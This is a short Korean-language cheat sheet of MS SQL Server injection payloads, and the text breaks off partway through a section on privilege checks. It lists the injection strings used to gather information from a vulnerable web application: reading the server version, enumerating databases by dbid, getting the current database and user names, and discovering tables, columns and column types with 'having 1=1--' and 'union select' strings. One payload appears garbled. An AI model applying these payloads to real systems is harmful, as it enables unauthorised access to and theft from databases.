MS SQL Injection정보수집1. 버전 체크 and 1=(select @@VERSION)2. DB 확인 : DB가 존재하면 에러출력, 존재하지 않으면 정상작동 sysdatabases dbid 1-6은 시스템db, 7~ 사용자db and 1=(select name from master.dbo.sysdatabases where dbid=7) 3. 현재 DB명 조회 : and 0db_name()4. 현재 유저명 조회 : and user>0 데이터베이스 구조5. 현재 테이블 조회 : ' having 1=1--6. 현재 컬럼명 조회 : ' group by users.id having 1=1--7. 컬럼 타입 조회 : ' union select sum(컬럼명) from 테이블명-- 5. 권한 체크 : 1) ..